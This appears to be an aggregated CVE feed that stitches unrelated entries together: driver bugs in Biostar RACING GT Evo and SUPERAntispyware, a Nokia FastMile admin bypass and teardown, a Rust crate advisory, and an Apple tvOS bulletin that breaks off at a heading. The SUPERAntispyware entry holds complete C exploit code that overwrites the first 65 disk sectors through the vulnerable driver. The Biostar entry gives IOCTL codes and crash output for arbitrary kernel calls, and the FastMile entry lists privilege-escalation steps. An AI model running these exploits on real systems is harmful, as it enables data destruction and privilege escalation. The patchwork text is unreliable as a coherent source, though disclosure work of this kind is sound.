Possible memory corruption in BT controller when it receives an oversized LMP packet over 2-DH1 link and leads to denial of service in BlueCore

CVE-2021-35093: December 2021 Security Bulletin | Qualcomm

An issue was discovered in BS_RCIO64.sys in Biostar RACING GT Evo 2.1.1905.1700. A low-integrity process can open the driver's device object and issue IOCTLs to read or write to arbitrary physical memory locations (or call an arbitrary address), leading to execution of arbitrary code. This is associated with 0x226040, 0x226044, and 0x226000.

**CVE-2021-44852 – Biostar RACING GT Evo**

The Biostar RGB Peripheral Configuration utility, RACING GT Evo v2.1.1905.1700 deploys a driver whose device is created with an insufficient DACL. The driver in question, “BS\_RCIO64.sys” contains three vulnerable functions:

*   Arbitrary read of physical memory via MmMapIoSpace
    *   IOCTL : 0x226040
    *   Description: A low-integrity process may leverage the device to read arbitrary physical memory. This may aid in privilege escalation or code execution.
*   Arbitrary write of physical memory via MmMapIoSpace
    *   IOCTL : 0x226044
    *   Description: A low-integrity process may leverage the device to write arbitrary physical memory. This may aid in privilege escalation or code execution.
*   Arbitrary code execution
    *   IOCTL : 0x226000
    *   Description: A low-integrity process may leverage the device to call an arbitrary address, leading to code execution which may result in privilege escalation.

File information:

*   BS\_RCIO64.sys
    *   SHA256 – D205286BFFDF09BC033C09E95C519C1C267B40C2EE8BAB703C6A2D86741CCD3E
    *   File Version (self-reported): 10.0.0.0
    *   Product Version (self-reported): 10.0.1901.1100
    *   Device Symlink: \\\\.\\BS\_RCIO
*   RACING GT Evo
    *   Product Version: 2.1.1905.1700
        *   Source: hxxps://www.biostar\[.\]com\[.\]tw/event/RAZER/2.1.1905.1700.rar

Demonstrating opening device as a low integrity user by leveraging OSR’s FileTest application:

![](https://nephosec.com/wp-content/uploads/2021/12/1.png "1")

The following screenshot demonstrates the ioctl dispatch routine invoking the vulnerable routines (noted by EOL comments with the corresponding IOCTL codes):

![](https://nephosec.com/wp-content/uploads/2021/12/2.png "2")

Arbitrary Physical Read Routine:

![](https://nephosec.com/wp-content/uploads/2021/12/3.png "3")

Arbitrary Physical Write Routine:

![](https://nephosec.com/wp-content/uploads/2021/12/4.png "4")

Arbitrary Execution Routine:

![](https://nephosec.com/wp-content/uploads/2021/12/5.png "5")

The first QWORD in the associated input buffer is cast to a function pointer receiving three arguments, and then calls the user-controlled pointer. The following screenshot shows arbitrary code execution by setting the first QWORD in the input buffer to 0x4141414141411441:

![](https://nephosec.com/wp-content/uploads/2021/12/6.png "6")

Side-by-side view showing disassembly and decompilation of the target vulnerable function:

![](https://nephosec.com/wp-content/uploads/2021/12/7.png "7")

Bugcheck output in Windbg Preview:

1: kd> g
KDTARGET: Refreshing KD connection

\*\*\* Fatal System Error: 0x0000003b
                       (0x00000000C0000005,0xFFFFF800766311CA,0xFFFF9402CC6C9C80,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

For analysis of this file, run !analyze -v
nt!DbgBreakPointWithStatus:
fffff800\`7a61dbf0 cc              int     3
1: kd> !analyze -v
\*\*\* Unable to resolve unqualified symbol in Bp expression 'BS\_RCIO64+0x10CD'.
Connected to Windows 10 22000 x64 target at (Tue Dec  7 13:24:37.265 2021 (UTC - 5:00)), ptr64 TRUE
\*\*\* Unable to resolve unqualified symbol in Bp expression 'BS\_RCIO64+0x10CD'.
Loading Kernel Symbols
...............................................................
................................................................
................................................................
.
Loading User Symbols
.....
Loading unloaded module list
.........

\*\*\*\*\*\*\*\*\*\*\*\*\* Symbol Loading Error Summary \*\*\*\*\*\*\*\*\*\*\*\*\*\*
Module name            Error
SharedUserData         No error - symbol load deferred

You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and 
repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*
\*                                                                             \*
\*                        Bugcheck Analysis                                    \*
\*                                                                             \*
\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

SYSTEM\_SERVICE\_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the BugCheck
Arg2: fffff800766311ca, Address of the instruction which caused the BugCheck
Arg3: ffff9402cc6c9c80, Address of the context record for the exception that caused the BugCheck
Arg4: 0000000000000000, zero.

Debugging Details:
\------------------

\*\*\* WARNING: Unable to verify checksum for BiostarDriverExploit.exe

KEY\_VALUES\_STRING: 1

    Key  : Analysis.CPU.mSec
    Value: 4312

    Key  : Analysis.DebugAnalysisManager
    Value: Create

    Key  : Analysis.Elapsed.mSec
    Value: 45866

    Key  : Analysis.Init.CPU.mSec
    Value: 1265

    Key  : Analysis.Init.Elapsed.mSec
    Value: 108666

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 112

    Key  : WER.OS.Branch
    Value: co\_release

    Key  : WER.OS.Timestamp
    Value: 2021-06-04T16:28:00Z

    Key  : WER.OS.Version
    Value: 10.0.22000.1

BUGCHECK\_CODE:  3b

BUGCHECK\_P1: c0000005

BUGCHECK\_P2: fffff800766311ca

BUGCHECK\_P3: ffff9402cc6c9c80

BUGCHECK\_P4: 0

CONTEXT:  ffff9402cc6c9c80 -- (.cxr 0xffff9402cc6c9c80)
rax=ffff840f53efb340 rbx=0000000000000002 rcx=00000000002260c4
rdx=ffff840f535f8230 rsi=0000000000000000 rdi=0000000000000000
rip=fffff800766311ca rsp=ffff9402cc6ca6a0 rbp=0000000000000000
 r8=0000000000000110  r9=ffff9402cc6ca730 r10=0000fffff8007663
r11=ffff9ffeeae00000 r12=0000000000000000 r13=ffff840f535f8230
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050202
BS\_RCIO64+0x11ca:
fffff800\`766311ca ff10            call    qword ptr \[rax\] ds:002b:ffff840f\`53efb340=4141414141414141
Resetting default scope

PROCESS\_NAME:  BiostarDriverExploit.exe

STACK\_TEXT:  
ffff9402\`cc6ca6a0 fffff800\`7a44d501     : ffff840f\`548d97c0 ffff840f\`535f8230 00000000\`00040282 fffff800\`00000000 : BS\_RCIO64+0x11ca
ffff9402\`cc6ca760 fffff800\`76632d58     : ffff840f\`535f8230 ffff9402\`cc6ca871 00000000\`00000002 00000000\`00000001 : nt!IoStartPacket+0x91
ffff9402\`cc6ca7a0 fffff800\`7a502f65     : 840f5645\`42536f49 f177d485\`c891927c 00000000\`00000000 00000000\`00000110 : BS\_RCIO64+0x2d58
ffff9402\`cc6ca7d0 fffff800\`7a96b532     : 00000000\`00000001 ffff840f\`535f8230 ffff9402\`cc6ca871 fffff800\`00000000 : nt!IofCallDriver+0x55
ffff9402\`cc6ca810 fffff800\`7a96acbf     : ffff840f\`535f8230 ffff9402\`cc6cab60 00000000\`00226005 00000000\`00226000 : nt!IopSynchronousServiceTail+0x1d2
ffff9402\`cc6ca8c0 fffff800\`7a96a6c6     : 00007ff6\`be416480 00000000\`00000000 00000000\`00000000 00000000\`00000000 : nt!IopXxxControlFile+0x5df
ffff9402\`cc6caa00 fffff800\`7a627b78     : 00000000\`00000000 00000000\`00000000 00000000\`00000000 00000000\`00000000 : nt!NtDeviceIoControlFile+0x56
ffff9402\`cc6caa70 00007ffb\`68783444     : 00007ffb\`66053edb 00007ff6\`00002282 00007ff6\`be3b04f3 00007ff6\`be489100 : nt!KiSystemServiceCopyEnd+0x28
000000a9\`6ceff3d8 00007ffb\`66053edb     : 00007ff6\`00002282 00007ff6\`be3b04f3 00007ff6\`be489100 00007ff6\`be3b04f3 : ntdll!NtDeviceIoControlFile+0x14
000000a9\`6ceff3e0 00007ffb\`66c35f91     : 00000000\`00226000 00007ff6\`be40cd97 000000a9\`6ceff4c8 00007ff6\`be3c469d : KERNELBASE!DeviceIoControl+0x6b
000000a9\`6ceff450 00007ff6\`be38a946     : 00000000\`00000000 cccccccc\`cccccccc 000000a9\`6ceff4e0 00000000\`00000000 : KERNEL32!DeviceIoControlImplementation+0x81
000000a9\`6ceff4a0 00000000\`00000000     : cccccccc\`cccccccc 000000a9\`6ceff4e0 00000000\`00000000 00000000\`00000000 : BiostarDriverExploit!ExecuteFunction+0xd6 
\[C:\\Users\\Michael\\source\\repos\\BiostarDriverExploit\\BiostarDriverExploit\\Biostar.cpp @ 90\] 

SYMBOL\_NAME:  BS\_RCIO64+11ca

MODULE\_NAME: BS\_RCIO64

IMAGE\_NAME:  BS\_RCIO64.sys

STACK\_COMMAND:  .cxr 0xffff9402cc6c9c80 ; kb

BUCKET\_ID\_FUNC\_OFFSET:  11ca

FAILURE\_BUCKET\_ID:  0x3B\_c0000005\_BS\_RCIO64!unknown\_function

OS\_VERSION:  10.0.22000.1

BUILDLAB\_STR:  co\_release

OSPLATFORM\_TYPE:  x64

OSNAME:  Windows 10

FAILURE\_ID\_HASH:  {ba69bbee-70a0-25f2-73c1-6621f523085b}

Followup:     MachineOwner
\---------

1: kd> k
 # Child-SP          RetAddr               Call Site
00 ffff9402\`cc6c8b28 fffff800\`7a762af2     nt!DbgBreakPointWithStatus
01 ffff9402\`cc6c8b30 fffff800\`7a762331     nt!KiBugCheckDebugBreak+0x12
02 ffff9402\`cc6c8b90 fffff800\`7a615697     nt!KeBugCheck2+0xa71
03 ffff9402\`cc6c9300 fffff800\`7a6281a9     nt!KeBugCheckEx+0x107
04 ffff9402\`cc6c9340 fffff800\`7a6275bc     nt!KiBugCheckDispatch+0x69
05 ffff9402\`cc6c9480 fffff800\`7a61ed32     nt!KiSystemServiceHandler+0x7c
06 ffff9402\`cc6c94c0 fffff800\`7a486347     nt!RtlpExecuteHandlerForException+0x12
07 ffff9402\`cc6c94f0 fffff800\`7a48a291     nt!RtlDispatchException+0x2d7
08 ffff9402\`cc6c9c50 fffff800\`7a6282ce     nt!KiDispatchException+0x1b1
09 ffff9402\`cc6ca330 fffff800\`7a623e8f     nt!KiExceptionDispatch+0x10e
0a ffff9402\`cc6ca510 fffff800\`766311ca     nt!KiGeneralProtectionFault+0x30f
0b ffff9402\`cc6ca6a0 fffff800\`7a44d501     BS\_RCIO64+0x11ca
0c ffff9402\`cc6ca760 fffff800\`76632d58     nt!IoStartPacket+0x91
0d ffff9402\`cc6ca7a0 fffff800\`7a502f65     BS\_RCIO64+0x2d58
0e ffff9402\`cc6ca7d0 fffff800\`7a96b532     nt!IofCallDriver+0x55
0f ffff9402\`cc6ca810 fffff800\`7a96acbf     nt!IopSynchronousServiceTail+0x1d2
10 ffff9402\`cc6ca8c0 fffff800\`7a96a6c6     nt!IopXxxControlFile+0x5df
11 ffff9402\`cc6caa00 fffff800\`7a627b78     nt!NtDeviceIoControlFile+0x56
12 ffff9402\`cc6caa70 00007ffb\`68783444     nt!KiSystemServiceCopyEnd+0x28
13 000000a9\`6ceff3d8 00007ffb\`66053edb     ntdll!NtDeviceIoControlFile+0x14
14 000000a9\`6ceff3e0 00007ffb\`66c35f91     KERNELBASE!DeviceIoControl+0x6b
15 000000a9\`6ceff450 00007ff6\`be38a946     KERNEL32!DeviceIoControlImplementation+0x81
16 000000a9\`6ceff4a0 00000000\`00000000     BiostarDriverExploit!ExecuteFunction+0xd6 
\[C:\\Users\\Michael\\source\\repos\\BiostarDriverExploit\\BiostarDriverExploit\\Biostar.cpp @ 90\] 
1: kd> r
rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003
rdx=000000000000008a rsi=0000000000000000 rdi=0000000000000000
rip=fffff8007a61dbf0 rsp=ffff9402cc6c8b28 rbp=ffff9402cc6c8c90
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000010
r11=0000000000000000 r12=0000000000000003 r13=fffff8007a200000
r14=ffff9402cc6c9c01 r15=fffff8007a762bb0
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040286
nt!DbgBreakPointWithStatus:
fffff800\`7a61dbf0 cc              int     3

BSOD – bugcheck after RIP set to 0x4141414141414141:

![](https://nephosec.com/wp-content/uploads/2021/12/8.png "8")

🙁

CVE-2021-44852: Biostar Exploit – NephōSec

SUPERAntispyware v8.0.0.1050 was discovered to contain an issue in the component saskutil64.sys. This issue allows attackers to arbitrarily write data to the device via IOCTL 0x9C402140.

SUPERAntispyware backdoor

This is saskutil64.sys 1.0.0.1016 driver of SUPERAntispyware 8.0.0.1050 (current), both Free/Pro editions.

The SaskCallDriver function work with fixed size buffer send from user mode.

This buffer is a structure defined as

#pragma pack(push, 1)

typedef struct \_CALL\_DRV {

WCHAR DeviceName\[2048\]; //e.g. \\Device\\Harddisk0\\DR0

LARGE\_INTEGER StartingOffset;

SIZE\_T DataSize;

PVOID DataPtr; //pointer to user mode allocated buffer of DataSize length.

} CALL\_DRV, \* PCALL\_DRV;

#pragma pack(pop)

Purpose of this function is to build synchronous I/O request for given device and send data to it (IRP\_MJ\_WRITE).

This function is totally bugged as it skips all critical API result checks.

For example any wrong device name will lead to bugcheck because code does not validate IoGetDeviceObjectPointer or

IoBuildSynchronousFsdRequest calls.

Additionally it is backdoor as such functionality should not be available for user mode applications directly.

The SASKUTIL driver device has default security descriptor and can be used by any local user.

This feature maybe used for various kind of things, including data wipe or sending udp/tcp packets.

NTSTATUS SaskCallDriver(PVOID Unreferenced, PIRP Irp)

{

CALL\_DRV\* CallDrvStruct;

PVOID writeBuffer;

IRP \*writeIrp;

UNICODE\_STRING deviceString;

IO\_STATUS\_BLOCK statusBlock;

KEVENT waitEvent;

PDEVICE\_OBJECT deviceObject;

LARGE\_INTEGER startingOffset;

PFILE\_OBJECT fileObject;

CallDrvStruct = (CALL\_DRV\*)Irp->AssociatedIrp.SystemBuffer;

\_\_try {

if ((ULONG\_PTR)CallDrvStruct < 0x8000000000000000)

{

ProbeForRead(CallDrvStruct, 4120, 1);

ProbeForWrite(CallDrvStruct, 4120, 1);

}

}

\_\_except (EXCEPTION\_EXECUTE\_HANDLER) {

return STATUS\_ACCESS\_VIOLATION;

}

\_\_try {

writeBuffer = CallDrvStruct->DataPtr;

if ((ULONG\_PTR)writeBuffer < 0x8000000000000000)

{

ProbeForRead(writeBuffer, CallDrvStruct->DataSize, 1);

ProbeForWrite(CallDrvStruct->DataPtr, CallDrvStruct->DataSize, 1);

}

}

\_\_except (EXCEPTION\_EXECUTE\_HANDLER) {

return STATUS\_ACCESS\_VIOLATION;

}

RtlInitUnicodeString(&deviceString, CallDrvStruct->DeviceName);

IoGetDeviceObjectPointer(&deviceString, FILE\_READ\_ATTRIBUTES, &fileObject, &deviceObject); // No check of API call

startingOffset = CallDrvStruct->StartingOffset;

KeInitializeEvent(&waitEvent, NotificationEvent, FALSE);

writeIrp = IoBuildSynchronousFsdRequest( // No check of API call

IRP\_MJ\_WRITE,

deviceObject,

CallDrvStruct->DataPtr,

CallDrvStruct->DataSize,

&startingOffset,

&waitEvent,

&statusBlock);

writeIrp->Flags = IRP\_BUFFERED\_IO;

if (IofCallDriver(deviceObject, writeIrp) == STATUS\_PENDING) // This will bugcheck if anything from above failed.

KeWaitForSingleObject(&waitEvent, Executive, KernelMode, FALSE, NULL);

return STATUS\_SUCCESS;

}

#pragma warning(disable: 4005)

#include <windows.h\>

#include <strsafe.h\>

#include <ntstatus.h\>

#include "ntos.h"

NTSTATUS CallDriver(

\_In\_ HANDLE DeviceHandle,

\_In\_ ULONG IoControlCode,

\_In\_opt\_ PVOID InputBuffer,

\_In\_opt\_ ULONG InputBufferLength,

\_In\_opt\_ PVOID OutputBuffer,

\_In\_opt\_ ULONG OutputBufferLength)

{

BOOL bResult = FALSE;

IO\_STATUS\_BLOCK ioStatus;

return NtDeviceIoControlFile(DeviceHandle,

NULL,

NULL,

NULL,

&ioStatus,

IoControlCode,

InputBuffer,

InputBufferLength,

OutputBuffer,

OutputBufferLength);

}

#pragma pack(push, 1)

typedef struct \_CALL\_DRV {

WCHAR DeviceName\[2048\];

LARGE\_INTEGER StartingOffset; // +0x1000

SIZE\_T DataSize; // +0x1008

PVOID DataPtr; // +0x1010

} CALL\_DRV, \* PCALL\_DRV;

#pragma pack(pop)

ULONG u = FIELD\_OFFSET(CALL\_DRV, DataPtr);

#define SAS\_DEVICE 0x9C40

#define IOCTL\_SAS\_CALLDRIVER CTL\_CODE(SAS\_DEVICE, 0x850, METHOD\_BUFFERED, FILE\_ANY\_ACCESS)

int main()

{

NTSTATUS ntStatus;

CALL\_DRV request;

HANDLE deviceHandle = CreateFile(TEXT("\\\\\\\\.\\\\SASKUTIL"),

GENERIC\_READ | GENERIC\_WRITE,

0,

NULL,

OPEN\_EXISTING,

0,

NULL);

if (deviceHandle == INVALID\_HANDLE\_VALUE) {

printf\_s("\[!\] Unable to open device\\r\\n");

#ifndef \_DEBUG

return -1;

#endif

}

else {

printf\_s("\[+\] SASKUTIL device opened\\r\\n");

}

system("pause");

WCHAR writeData\[512\];

memset(&writeData, 0xAB, sizeof(writeData));

RtlSecureZeroMemory(&request, sizeof(request));

wcscpy\_s(request.DeviceName, L"\\\\Device\\\\Harddisk0\\\\DR0");

request.DataSize = sizeof(writeData);

request.DataPtr = &writeData;

for (ULONG i = 0; i < 65; i++) {

request.StartingOffset.LowPart = (i \* 512);

ntStatus = CallDriver(deviceHandle,

IOCTL\_SAS\_CALLDRIVER,

&request,

sizeof(CALL\_DRV),

NULL,

0);

printf\_s("\[+\] CallDriver NTSTATUS 0x%lX\\r\\n", ntStatus);

}

CloseHandle(deviceHandle);

}

CVE-2020-22061: SUPERAntispyware backdoor

Nokia FastMile 3TG00118ABAD52 devices allow privilege escalation by an authenticated user via is_ctc_admin=1 to login_web_app.cgi and use of Import Config File.

As a part of my 5G home internet offering, Optus bundles a 5G gateway called the Nokia Fastmile. The same device seems to be shipped by T-Mobile for their 5G offering and is passionately known as the 'trashcan' in r/tmobileisp.

![](https://eddiez.me/content/images/2021/10/ResrcID22518_GW_bottom.png)

Nokia Fastmile Stock Photo

Naturally, the first thing I tried to do is to obtain root access on it.

**Finding a Privilege Escalation Bug**

EDIT: This has been assigned CVE-2021-45896.

Immediately, the first thing I noticed is that the provided userAdmin credentials printed on the bottom of the device seem to be a low level account.

Taking a peak at the requests going on when logging in immediately reveals an authenticated privilege escalation vulnerability. This likely also affects other Nokia devices. My firmware version: 3TG00118ABAD52.

When logging in, a call is made to POST /login\_web\_app.cgi.

If you intercept the response you will see that there is a variable called "is\_ctc\_admin".

![](https://eddiez.me/content/images/2021/10/image-2.png)

Change "is\_ctc\_admin" to 1

If you change this in the response to 1 you get access to additional functionality and full admin. The vulnerability is a classic access control issue where authorisation is handled only on the client side.

Now we have access to an additional tab but also more functionality in some existing tabs.

![](https://eddiez.me/content/images/2021/10/image-3.png)

SPAN Ports!

![](https://eddiez.me/content/images/2021/10/image-7.png)

QOS

![](https://eddiez.me/content/images/2021/10/image-4.png)

Backup and Restore Configuration

**Modifying the Configuration**

Doing some Googling I came across this smart guy who figured out the format of Nokia's configuration file format and wrote a tool to unpack, and pack configuration files so that you can make changes that aren't available through the web interface.

Unlocking IAM’s Nokia G-240W-A router (Part 1) · 0x41.cf

![](https://0x41.cf/favicon.png)

![](https://i.0x41.cf/b/nokia-g-240w-a.png)

The tool he wrote also works for the Nokia Fastmile: https://gist.github.com/thedroidgeek/80c379aa43b71015d71da130f85a435a

Following the write-up gets us all the way to SSH/Telnet access to the device however we are stopped by this annoying password prompt for shell access.

None of the passwords in the configuration file work for this shell password.

![](https://eddiez.me/content/images/2021/10/image-8.png)

???

Some other comments mention changing LimitAccount\_ONTUSER to false and logging in with ONTUSER:SUGAR2A041 however this doesn't seem to work for the Fastmile.

**Giving Up and Moving to Looking at Hardware**

randomsrvapps over at Whirlpool seems to have managed to get a trivial root shell via UART/ADB revealing that the device is Android based? Lets verify this.

Flipping the device over we see some ports that seem to be covered (circled in yellow on the photo).

![](https://eddiez.me/content/images/2021/11/4032-3024-resize.jpg)

These stickers can only be uncovered from the rear as the stickers they used are quite strong. By undoing circled bolts in red (Torx T15H) and removing the sim card, the feet come off and we can poke out the stickers.

This reveals a USB-C port and two RJ12 ports.

![](https://eddiez.me/content/images/2021/11/3024-4032-resize-crop.jpg)

USB-C is Top Right

**It runs Android?**

As per the thread, plugging into the USB-C port and running ADB shell gives us an immediate root shell on the device.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-13-16-50-43.png)

Interestingly it has a Snapdragon 855 in it, the same processor that was in previous generation flagships like the Google Pixel 4.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-20-22-43-15.png)

Snapdragon 855

I also confirmed that you can get this same console access by plugging into the pins outlined in the thread. These terminals are 1.8v logic level and the pins from inside to out are RX, TX, and ground with a baud rate of 115200.

![](https://eddiez.me/content/images/2021/11/3024-4033-resize-canvas.jpg)

Having a poke around via ADB shell reveals some oddities.

The most noteworthy being that the IP addressing scheme of my local network configured via the WEB-UI (172.10.0.0/24) is non-existent and some random private subnet 192.168.85.0/24 shows up.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-21-08-14-26.png)

Performing a traceroute from my local machine we see traffic get routed through this 192.168.85.0/24 subnet as well.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-21-08-24-13.png)

The First Hop Is My pfsense Firewall (I'm Running Double NAT)

This can also be verified by performing a tcpdump with a filter on the Fastmile whilst pinging 9.9.9.9.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-21-08-23-56.png)

Why is our IP address 192.168.85.6??

I immediately copied over a precompiled binary of busybox onto the Fastmile to try to run ARP.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-21-08-28-12.png)

Then the realisation came.

**It's Two Devices in One Box!**

Nokia have basically taped a 5G capable phone to one of their old Alcatel-Lucent routers and shipped it in a cylindrical box. This also explains why the configuration modification tool earlier worked flawlessly.

![](https://eddiez.me/content/images/2021/11/Nokia-Fastmile.jpg)

Having root on the Android side doesn't help at all with getting root on the router side!

Using this knowledge we can also enable remote Android debugging by first adding a firewall rule.

    iptables -I INPUT 1 -s 192.168.85.6 -j ACCEPT

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-13-22-38-34.png)

Enabling remote debugging on a port.

    adb tcpip 5555 //While connected via USB.
    

Then connecting remotely without having to be tethered to the device.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-13-22-43-12.png)

Looking back at the physical device again you can even see two different PCB types.

![](https://eddiez.me/content/images/2021/11/4032-3026-resize-annotated-2.jpg)

UART pins are also provided for the router side that are easily accessible. These pins are 3.3v logic level and the pins from inside out are ground, RX, TX with a baud rate of 115200.

![](https://eddiez.me/content/images/2021/11/4032-3027-resize.jpg)

Letting it boot whilst connected via UART drops us into the same restricted shell that we had earlier via SSH where we don't know the 'shell' password. Not helpful.

Interrupting boot drops us in CFE but I don't have the patience to dump the image over serial as that would take ~4 days. Otherwise, I'm not too familiar with CFE and am not super keen on turning my Fastmile into a $400 brick.

![](https://eddiez.me/content/images/2021/11/Screenshot-from-2021-11-14-00-39-45.png)

Changing the GPON Password Board Parameter Doesn't Do Anything

If anyone else has any advice/knowledge feel free to ping me at email, we still aren't root after all this.

**Teardown**

Out of curiosity, I took the device apart a bit more as I hadn't seen any other write-ups detailing this.

Tracing back to the step where we'd removed the bottom of the device, the next step of disassembly is to bend back the clips around the perimeter circled in red. I've also circled the UART pins in yellow for clarity.

![](https://eddiez.me/content/images/2021/11/clips_resize.jpg)

Now you can flip the device and lift up the white shell to reveal the antennas.

![](https://eddiez.me/content/images/2021/11/antenna-resized.jpg)

Every bolt from here on is a Torx T8H. Looking at the top there are 5 bolts to undo which loosen the LED indicator board.

![](https://eddiez.me/content/images/2021/11/top-resized.jpg)

With the top LED indicator board off we can see where all the antenna's terminate. If you wanted to attach an external antenna, this is where you'd do it.

![](https://eddiez.me/content/images/2021/11/antenna-resized-1.jpg)

Unfortunately, accessibility to the connectors is very limited as some snake under the heatsink. I did try removing the heatsink later but it was pretty solidly bound to the PCB so I'm not sure if it's held together with a thermal epoxy or if I missed some bolts.

Next up, looking at the side of the device with the smaller heatsink (Android side), there are two more bolts on the diagonal face to loosen.

![](https://eddiez.me/content/images/2021/11/phone-side-resized.jpg)

This allows you to lift up 2/5 sides of the antenna assembly revealing the Android device.

![](https://eddiez.me/content/images/2021/11/phone-resized.jpg)

Removing the 4 bolts that hold the Android side in allows you to lift and fold the device over like we've done with the antenna panels.

![](https://eddiez.me/content/images/2021/11/phone-flipped-resized.jpg)

This also reveals the backside of the Alcatel-Lucent router and the only electrical interconnect between the two devices in the bottom right.

![](https://eddiez.me/content/images/2021/11/router-backside-resized-3.jpg)

I didn't go any further as the router side is mostly covered up by it's heatsink and if it's anything like the Android side then it was likely to also be difficult to remove.

CVE-2021-45896: WIP: Hacking the Nokia Fastmile

An issue was discovered in the actix-web crate before 0.7.15 for Rust. It can unsoundly coerce an immutable reference into a mutable reference, leading to memory corruption.

\`\`\`toml \[advisory\] id = "RUSTSEC-2018-0019" package = "actix-web" categories = \["memory-corruption"\] date = "2018-06-08" url = "https://github.com/actix/actix-web/issues/289" \[versions\] patched = \[">= 0.7.15"\] \`\`\` # Multiple memory safety issues Affected versions contain multiple memory safety issues, such as: - Unsoundly coercing immutable references to mutable references - Unsoundly extending lifetimes of strings - Adding the \`Send\` marker trait to objects that cannot be safely sent between threads This may result in a variety of memory corruption scenarios, most likely use-after-free. A significant refactoring effort has been conducted to resolve these issues.

CVE-2018-25024

In NetBSD through 9.2, the IPv6 Flow Label generation algorithm employs a weak cryptographic PRNG.

CVE-2021-45489

An issue was discovered in the Linux kernel before 5.15.11. There is a memory leak in the __rds_conn_create() function in net/rds/connection.c in a certain combination of circumstances.

CVE-2021-45480

This issue was addressed with a new entitlement. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra, iOS 12.4, tvOS 12.4. A local user may be able to read a persistent account identifier.

Released July 22, 2019

**Bluetooth**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic (Key Negotiation of Bluetooth - KNOB)

Description: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.

CVE-2019-9506: Daniele Antonioli of SUTD, Singapore, Dr. Nils Ole Tippenhauer of CISPA, Germany, and Prof. Kasper Rasmussen of University of Oxford, England

The changes for this issue mitigate CVE-2020-10135.

Entry added August 13, 2019, updated June 25, 2020

**Core Data**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: natashenka of Google Project Zero

**Core Data**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2019-8647: Samuel Groß and natashenka of Google Project Zero

**Core Data**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2019-8660: Samuel Groß and natashenka of Google Project Zero

**Game Center**

Available for: Apple TV 4K and Apple TV HD

Impact: A local user may be able to read a persistent account identifier

Description: This issue was addressed with a new entitlement.

CVE-2019-8702: Min (Spark) Zheng and Xiaolong Bai of Alibaba Inc.

Entry added February 24, 2020

**Heimdal**

Available for: Apple TV 4K and Apple TV HD

Impact: An issue existed in Samba that may allow attackers to perform unauthorized actions by intercepting communications between services

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2018-16860: Isaac Boukris and Andrew Bartlett of the Samba Team and Catalyst

**Image Processing**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted image may lead to a denial of service

Description: A denial of service issue was addressed with improved validation.

CVE-2019-8668: an anonymous researcher

Entry added October 8, 2019

**libxslt**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to view sensitive information

Description: A stack overflow was addressed with improved input validation.

CVE-2019-13118: found by OSS-Fuzz

**Profiles**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to restrict access to websites

Description: A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement.

CVE-2019-8698: Luke Deshotels, Jordan Beichler, and William Enck of North Carolina State University; Costin Carabaș and Răzvan Deaconescu of University POLITEHNICA of Bucharest

**Quick Look**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker may be able to trigger a use-after-free in an application deserializing an untrusted NSDictionary

Description: This issue was addressed with improved checks.

CVE-2019-8662: natashenka and Samuel Groß of Google Project Zero

**Siri**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: natashenka of Google Project Zero

**UIFoundation**

Available for: Apple TV 4K and Apple TV HD

Impact: Parsing a maliciously crafted office document may lead to an unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8657: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of document loads. This issue was addressed with improved state management.

CVE-2019-8690: Sergei Glazunov of Google Project Zero

**WebKit**
